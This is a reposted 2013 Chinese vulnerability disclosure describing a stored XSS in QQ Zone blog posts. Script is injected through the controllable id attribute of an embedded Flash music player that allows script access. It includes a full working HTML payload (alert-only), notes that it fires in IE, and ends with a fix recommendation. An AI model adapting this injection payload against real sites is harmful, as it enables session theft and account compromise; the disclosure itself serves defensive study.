记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

QQ空间某功能缺陷导致日志存储型XSS - 12

2013-05-16 17:45
漏洞具体原因已经在 [腾讯实例教程] 那些年我们一起学XSS - 21. 存储型XSS进阶 [猜测规则,利用Flash addCallback构造XSS] :http://www.hackdig.com/Article/201302/189053.html 有相关报告:
 
 
 
1. 插入音乐播放器时,代码中 object 的 allowscriptaccess 参数为always.
 
 
 
2. 音乐播放器的FLASH代码中,存在addCallback
 
 
 
3. object 的 id 可控
 
 
 
基于以上条件后,则可以构造以下代码:
 
 
 
 
<div class="blog_details_20120222"><div><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="410" height="100" src="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" bgcolor="#ffffff" menu="true" allowScriptAccess="always" name="musicFlash**" id="aaaa&quot;),(function(){if(!window.x){window.x=1;alert(1)}})(),(&quot;" ubb="1803680|3|http://stream6.qqmusic.qq.com/1803680.wma|I Do|7048|xxxx(Various Artist,xxxx)|0" class="blog_music"><param name="movie" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name="bgColor" value="#ffffff" /><param name="menu" value="true" /><param name="allowScriptAccess" value="always" /></object> <br><br></div></div>
 
 
 
4. IE下可触发XSS,此处仅弹窗,更标准的利用见之前报告。
 
 
 
 

 
修复方案:


要求开发人员注意:如果object标签的allowscriptaccess="always"或者"sameDomain"(默认),且调用的FLASH中存在addCallback,则一定要对id进行过滤。 
 

知识来源: www.2cto.com/Article/201305/211080.html

阅读:68541 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“QQ空间某功能缺陷导致日志存储型XSS - 12”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词